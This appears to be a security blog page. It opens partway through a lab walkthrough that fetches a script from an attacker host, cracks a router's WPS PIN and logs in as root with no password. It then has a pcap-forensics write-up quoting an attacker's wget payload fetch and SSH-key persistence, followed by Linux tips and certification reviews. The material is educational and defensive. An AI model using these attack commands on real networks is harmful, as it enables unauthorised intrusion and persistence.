    And iw scan also reveals some interesting information, including, critically, that WPS is currently enabled. Now, time for honesty - I would probably have gotten stuck here but for the fact I’d literally just finished reading about the workings of the “Pixie dust” attack (learn more here: https://forums.kali.org/archived/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack) ) which, it just so happens, will work here.

    root@attica02:/# iw wlan0 scan
    BSS 02:00:00:00:01:00(on wlan0)
    last seen: 2739.320s [boottime]
    TSF: 1722071149860324 usec (19931d, 09:05:49)
    freq: 2412
    beacon interval: 100 TUs
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -30.00 dBm
    last seen: 0 ms ago
    Information elements from Probe Response frame:
    SSID: plcrouter
    Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
    DS Parameter set: channel 1
    ERP: Barker_Preamble_Mode
    Extended supported rates: 24.0 36.0 48.0 54.0
    RSN: * Version: 1
    * Group cipher: CCMP
    * Pairwise ciphers: CCMP
    * Authentication suites: PSK
    * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
    Supported operating classes:
    * current operating class: 81
    Extended capabilities:
    * Extended Channel Switching
    * SSID List
    * Operating Mode Notification
    WPS: * Version: 1.0                              <---- Interesting!
    * Wi-Fi Protected Setup State: 2 (Configured)
    * Response Type: 3 (AP)
    * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
    * Manufacturer:
    * Model:
    * Model Number:
    * Serial Number:
    * Primary Device Type: 0-00000000-0
    * Device name:
    * Config methods: Label, Display, Keypad
    * Version2: 2.0
    

    While the workings of this attack are complex, as a would-be attacker we don’t have to care since we can rely on the fantastic oneshot.py script which will do the heavy lifting for us. We’ll first transfer the script:

    root@attica01:~# curl http://10.10.14.34:8080/oneshot.py > oneshot.py 
    curl http://10.10.14.34:8080/oneshot.py > oneshot.py 
      % Total   % Received % Xferd  Average Speed  Time   Time   Time  Current 
                     Dload  Upload  Total  Spent   Left  Speed 
    100 53267  100 53267   0   0  239k    0 --:--:-- --:--:-- --:--:--  238k 
    root@attica01:~# chmod +x oneshot.py 
    chmod +x oneshot.py 
    

    Give it execute permissions and pass it the wlan interface we alrready discovered as an argument

    root@attica01:~# ./oneshot.py -i wlan0 
    ./oneshot.py -i wlan0 
    [*] Running wpa_supplicant… 
    [*] BSSID not specified (--bssid) — scanning for available networks 
    Networks list: 
    \#   BSSID        ESSID           Sec.   PWR  WSC device name       WSC model 
    
    1) 02:00:00:00:01:00  plcrouter         WPA2   -30                  
    
    Select target (press Enter to refresh): 1 
    [*] Running wpa_supplicant… 
    [*] Trying PIN '12345670'… 
    [*] Scanning… 
    [*] Authenticating… 
    [+] Authenticated 
    [*] Associating with AP… 
    [+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter) 
    [*] Received Identity Request 
    [*] Sending Identity Response… 
    [*] Received WPS Message M1 
    [*] Sending WPS Message M2… 
    [*] Received WPS Message M3 
    [*] Sending WPS Message M4… 
    [*] Received WPS Message M5 
    [+] The first half of the PIN is valid 
    [*] Sending WPS Message M6… 
    [*] Received WPS Message M7 
    [+] WPS PIN: '12345670' 
    [+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!' 
    [+] AP SSID: 'plcrouter' 
    root@attica01:~# 
    
    
    

    Now that we know the shared key, we can set up a WPA supplicant and try to connect to the network - we first put the details into a config file, then establish the connection with wpa_supplicant -B

    root@attica01:/opt/PLC# wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' > config 
    <rase plcrouter 'NoWWEDoKnowWhaTisReal123!' > config 
    
    root@attica01:/opt/PLC# wpa_supplicant -B -c config -i wlan0 
    wpa_supplicant -B -c config -i wlan0 
    Successfully initialized wpa_supplicant 
    

    It looks like that worked - we can quickly verify:

    root@attica02:/tmp# iwconfig wlan0
    wlan0 IEEE 802.11 ESSID:"plcrouter"
    Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:01:00
    Bit Rate:54 Mb/s Tx-Power=20 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:on
    Link Quality=70/70 Signal level=-30 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:9 Missed beacon:0
    

    Were connected, but apparently dhcp isn’t running and we haven’t been assigned an IP address - let’s just configure one manually while avoiding 192.168.1.1 which is almost certainly the router itself.

    root@attica01:/opt/PLC# ifconfig wlan0 192.168.1.5 netmask 255.255.255.0 
    ifconfig wlan0 192.168.1.5 netmask 255.255.255.0 
    

    Now that we’re on the network, let’s gather a bit more information about the router…

    root@attica01:~# curl 192.168.1.1
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
                    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
                    <meta http-equiv="Pragma" content="no-cache" />
                    <meta http-equiv="Expires" content="0" />
                    <meta http-equiv="refresh" content="0; URL=cgi-bin/luci/" />
                    <style type="text/css">
                            body { background: white; font-family: arial, helvetica, sans-serif; }
                            a { color: black; }
    
                            @media (prefers-color-scheme: dark) {
                                    body { background: black; }
                                    a { color: white; }
                            }
                    </style>
            </head>
            <body>
                    <a href="cgi-bin/luci/">LuCI - Lua Configuration Interface</a>
            </body>
    </html>
    

    Humm, well that’s interesting - the LuCI Lua Configuration Interface is part of OpenWRT, an open source routing platform. By default, OpenWRT is also pretty lax with passwords, in fact, if I remember correctly the root password is just blank….

    root@attica01:/opt/PLC# ssh root@192.168.1.1 
    ssh root@192.168.1.1 
    Pseudo-terminal will not be allocated because stdin is not a terminal. 
    Host key verification failed. 
    root@attica01:/opt/PLC# python3 -c "import pty; pty.spawn('/bin/bash')" 
    python3 -c "import pty; pty.spawn('/bin/bash')" 
    root@attica01:/opt/PLC# ssh root@192.168.1.1 
    ssh root@192.168.1.1 
    The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established. 
    ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM. 
    This key is not known by any other names 
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
    yes 
    Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts. 
    BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash) 
    
    _______           ________     __
    
     |    |.-----.-----.-----.|  |  |  |.----.|  |_ 
     |  -  ||  _  |  -__|   ||  |  |  ||  _||  _| 
     |_______||  __|_____|__|__||________||__|  |____| 
          |__| W I R E L E S S  F R E E D O M 
     \----------------------------------------------------- 
     OpenWrt 23.05.2, r23630-842932a63d 
     \----------------------------------------------------- 
    === WARNING! ===================================== 
    There is no root password defined on this device! 
    Use the "passwd" command to set up a new password 
    in order to prevent unauthorized SSH logins. 
    \-------------------------------------------------- 
    root@ap:~# ls 
    ls 
    root.txt 
    root@ap:~# cd /root 
    cd /root 
    root@ap:~# cat root.txt 
    cat root.txt 
    51a6fc2a20efda3626f1483e9babedb4 
    root@ap:~# 
    

    Shoot it worked! Two default passwords on one box!

    Avoiding the Hack - Lessons learned

    So let’s now take a look at the vulnerabilities we found, and how they could have been avoided, although this time the lesson seems pretty clear!

    Never, ever, ever leave a default password on a device! New legislation is finally coming into place worldwide which obliges manufacturers to ship new devices with better, “Unique”* passwords but you should never keep these hanging around. This is a terrible idea from a security perspective, but also from an ops point of view - it’s easy to look at the code on the bottom of the router now, but perhaps not once you’ve shipped it out to a branch office.

    ** Dear hardware manufacturers -hashing the device ID, product number or anything else written on the case and using the beginning or end portion as a password does not count as secure, even it’ is technically unique. Sort of. MD5 doesn’t really meet that criteria either. A CRC certainly doesn’t. Rant over :)

  • Writeups

    Sherlocks are a new offering from HackTheBox - they’ve been available since the tail end of 2023 but I’ve been busy and have only just had time to dive into them. Rather than focusing on offensive security techniques, sherlocks provide a great opportunity to sharpen your blue teaming skills - and, so far I think they’re great fun! Here, there’s no flags to capture - rather you need to obtain information to solve a series of tasks, it’s quite similar to the approach used on HTB Academy. Meerkat is rated as “easy” by HackTheBox - it’s a great place to start with sherlocks, so let’s dive in!

    Scenario

    Sherlocks come with a bit of scenario information which can help you along the way with the tasks - I wish HTB Machines also did this! For Meerkcat, we get:

    As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren’t the most security aware. As our new security provider we’d like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.

    There’s also a a zip file to download, which contains a .pcap file with network traffic from the time of the suspected compromise as well as a .json file which seems to list some security events which were logged at the same time.

    We’ll open up the pcap file in wireshark - the json file is also worth a look through, but I was able to complete all the tasks just using the pcap. Let’s now work through the tasks.

    Tasks

    1 - We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

    First of all, we’ll want to get our bearings and figure out which system is hosting the business management platform - a good way to start analysing a pcap is to get a feel for which systems are sending the most traffic. Often (but not always) these will be of the most interest. We can easily find this out by choosing

    Statistics- > ipv4 statistics -> all addresses from the menu:

    172.31.6.44 is clearly the busiest host in this capture, and we also have significant traffic from 156.146.62.213, 34.207.150.13, 54.144.148.213, 95.181.232.30, and 138.199.59.221.

    As a starting point, let’s filter the packets for those destined to 172.31.6.4 - in the wireshark filter bar, we can type : ip.dst == 172.31.6.44 to do this easily.

    Browsing through the traffic we can quickly see there’s some HTTP traffic heading to an endpoint called /bonita/loginservice

    Bonita sounds like it could be the business management service, and a quick google confirms this is the case.

    Answer Number 1: Bonitasoft.

    We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

    In order to answer this one, let’s explore the traffic a bit further - we can filter our results down even more at this point too. Right now we’re only going to be interested in POST requests (ie. login requests) to the business management system so let’s add && http.request.method == POST to our filter. Being able to quickly filter traffic to find the information we’re interested in is one of wiresharks best features, so its worth experimenting a little if this is new to you!

    Now, we only have relevant traffic in view - these are all login attempts directed to the relevant server - clicking on a packet allows us to see the content (in the bottom pane) and working through these attempts reveals different usernames and passwords being submitted. More importantly for this task, we notice that sets of credentials (rather than multiple usernames with a single password at a time or vice versa) are being used - so the correct term is “credential stuffing”. We can also confirm that 156.146.62.312 is probably the primary attacker machine, since this is where each of these login attempts originates from.

    Answer Number 2: Credential Stuffing

    Does the vulnerability exploited have a CVE assigned - and if so, which one?

    There were two ways to approach this task - I simply kept scrolling through the requests here, until I saw an interesting one which jumped out at me:

    As you can see, packet numbers 2918 and 2925 don’t seem to be the same credential stuffing attack, rather we’ve got an unusual string in a request to an API endpoint - at this point, I googled “i18ntranslation bonitasoft” (Note- If you’re wondering: that ? is the query string delimiter, and not part of the string itself) and hit on this page from Rhino Security Labs:

    An alternative approach here would have been to check the json file with the security alerts - it does indeed have some warnings for CVE-2022-25237.

    Answer Number 3: CVE-2022-25237

    Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?

    Too easy - we already have that one!

    Answer Number 4: i18ntranslation

    How many combinations of usernames and passwords were used in the credential stuffing attack?

    For this one, we’ll want to filter down to find all of the requests to the login endpoint - we can do this with:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice"

    We can see from the bottom of the wireshark window that this gives us 118 packets - however that’s not right answer - some of these packets are duplicates using some installer credentials:

    So, let’s update our filter to get rid of those:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice" && !(http contains "install")

    I’m not sure if HTB are including this install/install combination as part of their credential stuffing count, I’ll assume not but keep in mind that I might need to add one more to my answer later. This filter now gives 59 packets, but - this isn’t the right answer either - looking through, there’s still a duplicate or two in there.

    To make things speedy, I’ll output the packets to a file, then use a bit of bash-fu to solve this one:

    Since the .pacp I’ve exported from wireshark is a binary rather than a text format, I’ll need to use the strings command to get the content, then pass this to grep, get strings matching “username” (which is present i all the login attempts), then I’ll use cut to separate the data at the = mark, and print out the second field (ie, the part after the =) - visually this gives something like this:

    $ strings creds.pcapng | grep username | cut -d = -f 2 | uniq  
    Clerc.Killich%40forela.co.uk&password 
    Lauren.Pirozzi%40forela.co.uk&password 
    <SNIP>
    Mathian.Skidmore%40forela.co.uk&password 
    Gerri.Cordy%40forela.co.uk&password 
    seb.broom%40forela.co.uk&password 
    

    Finally, I’ll pass this to wc (with the -l argument to get the number of lines)

    $strings creds.pcapng | grep username | cut -d = -f 2 | uniq | wc -l

    This gives me 56, which is the right answer. If you wanted an easier way of doing that, you could also just count the different logins by working through each packet. Something like this works better at scale however.

    Answer Number 5: 56

    Which username and password combination was successful?

    To solve this one, it’s possible to simply work through the packets using a filter like this:

    ip.src_host == 172.31.6.44 && ip.dst_host == 156.146.62.213 && http

    To see all the HTTP response packets from the business server to the attacker - we can work through this looking for a 2XX code, which will indicate success:

    We can find the login which was valid by working through the communications here - or, using out knowledge of HTTP response codes, we can make things really fast by searching for a 204 (login success!) response.

    This approach quickly finds the relevant packet, and the credentials which were used. In addition, we can see here that more than one IP was able to successfully authenticate - 138.199.59.221 also logged in. Let’s note that.

    If we explore the JSON format packets which follow this response, we can also see evidence of the attacker utilising the POC script provided in the Rhino Security Labs article, which further confirms the attack which took place.

    Answer Number 6: seb.broom@forela.co.uk:g0vernm3nt

    If any, which text sharing site did the attacker utilise?

    Let’s now “zoom out” a little, and get a broader view at what’s happening as part of this attack - we know that the attacker used a POC for the relevant CVE to gain access to the server, and it looks like they also used more than one host as part of the attack. From here, we’ll therefore filter with ip.host == 172.31.6.44 && http to get all of the http traffic to the business server again. Scrolling through, we can see the attacker exploiting the vulnerability to run cat /etc/passwd and then again to use wget to grab a file with wget https://pastes.io/raw/bx5gcr0et8 That’s our answer for this one!

    Here were finding the file we need in the packet view:

    Answer Number 7: Pastes.io

    Please provide the filename of the public key used by the attacker to gain persistence on our host.

    Let’s go and check out the file which is being downloaded here;

    So, this file contains a curl command which will download another text file (also from pastes.io) before appending it to the authorized_keys file. The content of pastes.io/hffgra4unv will be the attackers public key - and adding it to the systems authorized_keys file will provide them with a persistent way to log in using SSH.

    Answer Number 8: hffgra4unv

    Can you confirmed the file modified by the attacker to gain persistence?

    Another easy one, we already have this information!

    Answer Number 9: /home/ubuntu/.ssh/authorized_keys

    Can you confirm the MITRE technique ID of this type of persistence mechanism?

    Finally, a quick visit to the MITRE ATT&CK website and a search for SSH Authorized keys will allow us to find the technique ID : https://attack.mitre.org/techniques/T1098/004/

    Answer Number 9: T1098.004

    Final thoughts

    I really enjoyed Meerkat and I love the idea of sherlocks! Recently, I’ve felt that HTB machines have been becoming more and more nuanced and often, a bit obscure - this makes sense, it’s a gamified platform and they want to keep players interested, however I much prefer challenges which feel relevant to real world security. Sherlocks (so far at least) feel much more relevant and a great way to sharpen your blue teaming skills.

    See you in the next one!

Stuff I've learned

Latest Tips ( all )

  • Tips

    I recently ran into another interesting “bug” (I sure do seem to find a lot of them) although this one, to be fair, is more of a quirk than an actual error.

    As I often seem to need to do at the moment, I was spinning up a new Ubuntu instance in VirtualBox. VirtualBox v7 has a fancy new feature called “Unattended Installation” which I hadn’t previously either noticed or had cause to use. I thought I’d give it a try and found that it did, indeed, set my system up using the credentials that it asked me for, and even installed the Guest Tools. What’s not to love?

    Well, how about the fact that on booting I’m not root and have no idea of the root password. No problem - let’s sudo su… and no, password prompt. sudo -s? No, password prompt. sudo [the command I wanted to run] - password prompt. Shoot. I’ve no idea what the root password is. It turns out that VirtualBox 7’s “Unattended Installation” does not put your initial userid into the sudo group - instead, it sets the root (uid=0) password to the same password as the initial id (uid=1000).

    The solution is therefore to run su - and use the password you specified when kicking off the installation. Then add your user to sudoers with usermod -a -G sudo [username].

    This is a really weird way of going about this - VirtualBox, if you’re reading - Love the unattended installation option, don’t love this setup!

  • Tips

    After upgrading an Ubuntu machine to 20.10, I ran into an interesting error - although the upgrade was successful, the system in question still seemed to think it was running the previous version of Ubuntu - Running lsb_release gives me the following, still showing the old version form which I just upgraded:

    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.04
    Release:        23.04
    Codename:       lunar
    

    I was not able to find a solid explanation as to exactly why this happened! My best guess is that one or more of the base files were modified (by me) and therefore were not updated during the upgrade. The solution was to reinstall the base-files package, which contains /etc/lsb_release

    duck@server:~$ sudo apt reinstall base-files
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following package was automatically installed and is no longer required:
      wmdocker
    Use 'sudo apt autoremove' to remove it.
    The following packages will be upgraded:
      base-files
    1 upgraded, 0 newly installed, 0 to remove and 5 not upgraded.
    Need to get 73.8 kB of archives.
    After this operation, 26.6 kB of additional disk space will be used.
    Get:1 http://im.archive.ubuntu.com/ubuntu mantic-updates/main amd64 base-files amd64 13ubuntu2.1 [73.8 kB]
    Fetched 73.8 kB in 1s (92.4 kB/s)   
    (Reading database ... 199351 files and directories currently installed.)
    Preparing to unpack .../base-files_13ubuntu2.1_amd64.deb ...
    Unpacking base-files (13ubuntu2.1) over (12.3ubuntu2.1) ...
    Setting up base-files (13ubuntu2.1) ...
    Installing new version of config file /etc/debian_version ...
    Installing new version of config file /etc/issue.net ...
    motd-news.service is a disabled or a static unit not running, not starting it.
    Processing triggers for plymouth-theme-ubuntu-text (22.02.122-3ubuntu2) ...
    update-initramfs: deferring update (trigger activated)
    Processing triggers for install-info (7.0.3-2) ...
    Processing triggers for man-db (2.11.2-3) ...
    Processing triggers for initramfs-tools (0.142ubuntu15.1) ...
    update-initramfs: Generating /boot/initrd.img-6.5.0-14-generic
    
    
    

    Now, uname -a and lsb_release -a both display correctly.

    duck@server:~$ uname -a
    Linux server 6.5.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 14 14:59:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
    
    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.10
    Release:        23.10
    Codename:       mantic
    

    Hopefully, this helps someone!

  • Tips

    As a part of creating training material, or perhaps making a vulnerable machine for a CTF, I often need to enable MySQL root access with a password, and often a poor password which you should never * use in a production environment! Doing this on Ubuntu has become a bit more tricky (although really that’s a good thing) but it’s also something I need to do often enough that I forget the correct way to do it on an up-to-date system!

    By default Ubuntu does not configure the MySQL root account to authenticate with a password - rather, you access a new installation by running either sudo mysql or spawning a root shell and just running mysql. Incidentally, this approach also breaks the mysql_secure_installation script which is worth running for a production environment as it does pretty much what it says on the tin! Once you’ve access the root account, the ‘normal’ approach most people take to changing the password (and this is the error I usually make) is to run:

    ALTER USER 'root'@'localhost' IDENTIFIED BY 'password';
    

    And while this command will work, it won’t give you access on Ubuntu, since you also need to allow the root user to access mysql via password - therefore, we need to run:

    sudo mysql
    

    Then the following ALTER USER command to change the password and set the root user’s authentication method to one that uses a password. The following example changes the authentication method to mysql_native_password:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
    

    After making this change, exit the MySQL prompt:

    exit
    

    Following that, you can run the mysql_secure_installation script without any errors, or if you’re making a vulnerable / training system, you can now login with

    mysql -u root -p
    

    If you’d like to revert to the default setting on Ubuntu (perhaps after running mysql_secure_installation) simply use the command:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH auth_socket;
    
  • Tips

    If you’ve tried to install a Python package using pip install recently, and you’re running Debian 12 (or a derivative like Parrot 6 in my case) you may have been stumped by this error message:

    error: externally-managed-environment
    
    × This environment is externally managed
    ╰─> To install Python packages system-wide, try apt install
        python3-xyz, where xyz is the package you are trying to
        install.
    
        If you wish to install a non-Debian-packaged Python package,
        create a virtual environment using python3 -m venv path/to/venv.
        Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
        sure you have python3-full installed.
    
        If you wish to install a non-Debian packaged Python application,
        it may be easiest to use pipx install xyz, which will manage a
        virtual environment for you. Make sure you have pipx installed.
    
        See /usr/share/doc/python3.11/README.venv for more information.
    
    note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
    hint: See PEP 668 for the detailed specification.
    

    What’s going on here? Essentially, the externally-managed-environment error occurs when the system package manager (so apt, in this case) is managing Python packages, as a result, pip is not allowed (by default) to interfere with Python packages. If we take a look at the Python enhancement proposal PEP 668 we can see that the objective of this change is essentially to prevent users from unintentionally modifying packages which are required by the distribution and breaking stuff. Actually, this is a pretty good idea - however, it can be a pain if you’d rather run the risk and continue to use pip with reckless abandon like I would.

    It’s worth pointing out that if you’re managing a production system, you really should follow the advice given and try to install your required package using apt to get the version which is supported in your Distro’s repository - simply run sudo apt install python3-[desired package]. Again, if you need a non-supported package using a venv is the best way to go

    If, however, you want to be reckless, you have two options..

    Option 1 - Break system packages

    The error message says you can pass in the flag --break-system-packages and you can do exactly that - this won’t deliberately break system packages, rather it’s just overriding the protection which has been introduced and doing what pip always used to do. It might break some system packages though - it kinda told you that :)

    If using a venv is more effort than you want to put in (pipx does make this quite easy!) a good halfway house would be to try getting the package from apt first, and then use --break-system-packages if the package isn’t present in the repo.

    Option 2 - Delete EXTERNALLY-MANAGED

    For a longer-term solution which will totally disable this message, you can delete the EXTERNALLY-MANAGED file in your system Python installation:

    sudo rm -rf /usr/lib/python3.11/EXTERNALLY-MANAGED
    

    This will totally disable the protection though, so use with care. Python 3.11 is current as I’m writing this but by the time you read it, that directory might be different based on the current version.

Things that don't go in one of the other categories

Other Stuff ( all )

  • Other

    May 18, 2024 by Ducksec

    CompTIA SecurityX

    Last week I was invited by CompTIA to take the new SecurityX beta - so why not! I already have the CASP+, so this is a great opportunity to refresh knowledge and learn some new things - all for $50! The new eXpert series from ComTIA will eventually feature three exams, DataX, SecurityX and CloudNetX. According to Comptia:

    CompTIA Advanced Security Practitioner (CASP+) is the expert version of CompTIA Security+ and will be re-branded to SecurityX , with the next exam version. This name change will not affect the status of current CASP+ certification holders and those with an active CASP+ certification will receive a SecurityX certification. The certification will continue to:

    • Validate job tasks performed by a security professional with 10 years of IT experience and 5 years of security experience
    • Be designed around the tasks performed by senior security engineer and security architect roles
    • Be a natural progression from the job roles aligned to Security+

    I’ll be updating this blog as I make better notes on the changes between the old a new syllabi but for now let’s dive in with some initial impressions.

    So what’s changed?

    As usual there’s some general updates to ensure the certification aligns with the newest approaches and tools, but there’s also some larger shifts in the core areas of focus. My overall impression is that the SecurityX (CAS-005) specification places a stronger emphasis on proactive and advanced security measures which are more suitable for todays hyper connected environments, whilst adding some key new areas, such as AI security.

    For example, CompTIA have included objectives covering the adoption of zero trust architecture, cloud access security brokers (CASBs), and the integration of AI in security operations. An increased emphasis on automated security processes, including Security Orchestration, Automation, and Response (SOAR), and advanced cryptographic concepts like homomorphic encryption and post-quantum cryptography, also suggest a shift towards more sophisticated and automated security frameworks.

    In some places, familiar topics have been somewhat deepened and modernised - the inclusion of topics like continuous integration/continuous deployment (CI/CD) and advanced application security testing reflects the growing importance of secure software development practices, and an expanded approach to risk management is evident in sections covering supply chain risk management, formal methods for software security, and the introduction of Software Bill of Materials (SBoM).

    Here’s a quick summary of what’s changed - if you’re planning to take the beta, hopefully this helps you to focus in on what you may need to put some extra study into!

    Quick summary of Changes between CASP+ (CAS-004) and SecurityX (CAS-005)

    Firstly, the certification Domains have been re-named and modified:

    CASP+ (CAS-004) Domains

    1. Security Architecture
    2. Security Operations
    3. Security Engineering
    4. Security Governance, Risk, and Compliance

    SecurityX (CAS-005) Domains

    1. Governance, Risk and Compliance
    2. Security Architecture
    3. Security Engineering
    4. Security Operations

    As you might expect there’s some new topics in each section - for now, here’s a quick rundown of items which jumped out at me:

    New Topics in and areas of focus in SecurityX (CAS-005)

    1. Governance, Risk and Compliance
      • Supply Chain Risk Management
      • Updated GRC frameworks (DMA, COPPA etc.)
      • Focus on AI Security challenges
    2. Security Architecture
      • Zero Trust Architecture
      • Cloud Access Security Broker (CASB)
      • Integration of AI in Security
      • Software-Defined Networking (SDN)
      • Secure Access Service Edge (SASE)
      • Formal Methods for Software Security
      • Software Bill of Materials (SBoM)
      • Greater focus on APIs
    3. Security Engineering
      • Advanced Cryptographic Concepts
      • Specialised systems (IoT / OT)
      • Authenticated Encryption with Associated Data (AEAD)
      • TOML (Toms Obvious, Minimal Language)
      • Blockchain and Immutable Databases
      • Use of Post-Quantum Cryptography (PQC)
      • Virtualised technologies (eg vTPM)
    4. Security Operations
      • Greater focus on automation
      • Rita and Sigma (Rule based languages)

    I will update this post with more analysis as I start my studying!

  • Other

    Introduction

    Last year I enjoyed completing the AWS Solutions Architect Associate exam - so what better way to kick off 2024 than by taking on the Security specialism?!

    Certification Overview

    The AWS Certified Security - Specialty certification is a popular accreditation offered by Amazon Web Services (AWS) that, according to AWS “validates your expertise in creating and implementing security solutions in the AWS Cloud. This certification also validates understanding of specialised data classifications and AWS data protection mechanisms; data-encryption methods and AWS mechanisms to implement them; and secure internet protocols and AWS mechanisms to implement them.”.

    At the outset, it’s worth being clear that this is very much an AWS security certification - not a security certification with AWS as the focus. By this I mean that if you don’t already have a solid grounding in security principles don’t expect to master them by pursuing this certification, rather, take this certification to see how those principles apply in AWS specifically.

    AWS recommend that “AWS Certified Security - Specialty is intended for experienced individuals who have five years of IT security experience in designing and implementing security solutions and two or more years of hands-on experience in securing AWS workloads.” - my sense is that 5 years of security experience may be a bit overkill - the general security knowledge level required is probably on a par with Security+ - but the two years hands on with AWS isn’t. While the certification certainly covers many of the familiar services you know and love, it does tend to focus on more usual situations, edge cases and nuanced applications which you probably won’t be familiar with unless you’ve used the platform for a while.

    Exam Details

    • Exam Title: AWS Certified Security - Specialty

    • Exam Code: SCS-CO2

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 750 (on a scale of 100-1000)

    Exam Domains

    According to the specification, the AWS Security Specialist certification exam is divided into the following key domains:

    • Domain 1: Threat Detection and Incident Response (14% of scored content)
    • Domain 2: Security Logging and Monitoring (18% of scored content)
    • Domain 3: Infrastructure Security (20% of scored content)
    • Domain 4: Identity and Access Management (16% of scored content)
    • Domain 5: Data Protection (18% of scored content)
    • Domain 6: Management and Security Governance (14% of scored content)

    Like my last AWS exam, I felt that this was an accurate representation of the actual question split on the exam - although Logging and Monitoring felt a bit heavier than 18% on my specific exam.

    Study Resources

    As I’ve mentioned in previous reviews, AWS does provide a good variety of resources to help you study for the exam - on top of this there are some excellent third-party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d spend some time getting to know these for all the named security products on the exam. This is far from the most fun way to study, but many of the actual exam questions felt like they were lifted right from the documentation.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Official Practice Questions: AWS offer a free official practice exam (20 questions), find it on the exam information page, or through Skill Builder.
    • Official Practice Exam - Available as part of the skill builder subscription, last time, for Solutions Architect Associate, I thought that the practice exam was a great representation of the actual test - this time, not quite so much!
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You’ll want to ensure you have cost management in place before labbing much for this exam as many of the security services can be quite expensive!

    Preparation Tips

    Like many higher-level exams, this one seemed to focus quite heavily on nuances and edge cases, so don’t fall into the trap of concentrating only on the features which you’d most commonly use. I’d also be very familiar with services such as CloudFront, CloudWatch, CloudTrail and Security Hub which will certainly appear on the exam, but can also show up as part of a broader or more complex question.

    Much more annoyingly, AWS seem to have fallen into the trap of making their higher-level exam questions “harder” by producing incredibly long, overly wordy, intentionally confusing (perhaps a little bit harsh there..) questions which take forever to unpick. In actual fact (and here’s the key on the exam) much of this fluff makes very little difference to the answer to the question, but you’ll want to practice spotting keywords and phrases being used and mentally preparing yourself for an awful lot of reading and re-reading before you sit the real thing. Seriously, I like to study - I read a lot and I take more exams than is probably normal for a human being, but halfway through this exam I was exhausted with trying to wade through these questions!

    While studying, remember to pay attention to the relative cost of services, as well as their complexity and ease of use - a fair few of the exam questions will ask for the “most cost-effective” or “least effort” solution.

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward, all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score, or even a pass/fail after the exam itself. There’s speculation online that you only don’t receive a pass/fail after the exam if you have provisionally passed, but I can’t confirm if that’s 100% true - it was in my case, I got my pass notification about 10 hours after the exam (which was quicker than last time!). I must admit I’m not a fan of this - one assumes that AWS are reviewing exam recordings for signs of cheating - but isn’t that rather the function of the Pearson Vue proctor? Either way be ready for an additional wait after the exam itself.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review, this time round I used the feature to bookmark questions I was too tired of reading over!

    One real positive for this exam was that AWS seem to have decided to avoid questions involving double negatives, or those “select the option which does NOT” type answers, which I always find extra confusing for no real benefit. A new feature was the ability to change the colour of the exam interface - I hope this is going to apply to all Pearson Vue exams going forward as I found it quite nice to change the colours from time to time. I still finished with a massive headache, but there you go. The exam time was plenty - there’s no practical simulations, just straight multiple-choice.

    Should I get this certification?

